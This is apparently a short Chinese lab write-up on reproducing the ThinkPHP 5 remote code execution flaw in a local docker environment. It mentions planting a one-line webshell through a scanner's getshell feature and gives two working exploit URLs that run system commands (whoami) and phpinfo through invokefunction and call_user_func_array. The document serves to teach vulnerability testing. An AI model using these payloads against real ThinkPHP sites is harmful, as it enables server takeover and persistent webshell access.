常见框架漏洞—Thinkphp

1.搭建环境

cd /www/wwwroot/thinkphp/5-rce/

docker-compose up -d

2.访问我们搭建的环境

3.复制网站url到蓝鲸去测试漏洞

发现了两个漏洞

其中一个得到了一些信息

另一个漏洞我们在getshell中输入一句话木马,然后getshell,给我们生成了一个文件并上传到了文件,然后我们尝试访问

4.访问成功,然后我们传参

执行成功!

5.在url中输入:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可以执行我们的系统命令

6.输入;

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

可以执行我们的代码

相关推荐
sibylyue2 分钟前
Guava中常用的工具类
java·guava
奔跑吧邓邓子6 分钟前
【Java实战㉞】从0到1:Spring Boot Web开发与接口设计实战
java·spring boot·实战·web开发·接口设计
专注API从业者15 分钟前
Python/Java 代码示例:手把手教程调用 1688 API 获取商品详情实时数据
java·linux·数据库·python
Suckerbin24 分钟前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
奔跑吧邓邓子36 分钟前
【Java实战㉝】Spring Boot实战:从入门到自动配置的进阶之路
java·spring boot·实战·自动配置
ONLYOFFICE36 分钟前
【技术教程】如何将ONLYOFFICE文档集成到使用Spring Boot框架编写的Java Web应用程序中
java·spring boot·编辑器
fuyongliang12338 分钟前
nginx反向代理,负载均衡,tomcat的数据流向图篇解析
nginx·tomcat·负载均衡
叫我阿柒啊1 小时前
Java全栈开发工程师的实战面试经历:从基础到微服务
java·微服务·typescript·vue·springboot·前端开发·后端开发
cyforkk1 小时前
Spring 异常处理器:从混乱到有序,优雅处理所有异常
java·后端·spring·mvc
生擒小朵拉1 小时前
STM32添加库函数
java·javascript·stm32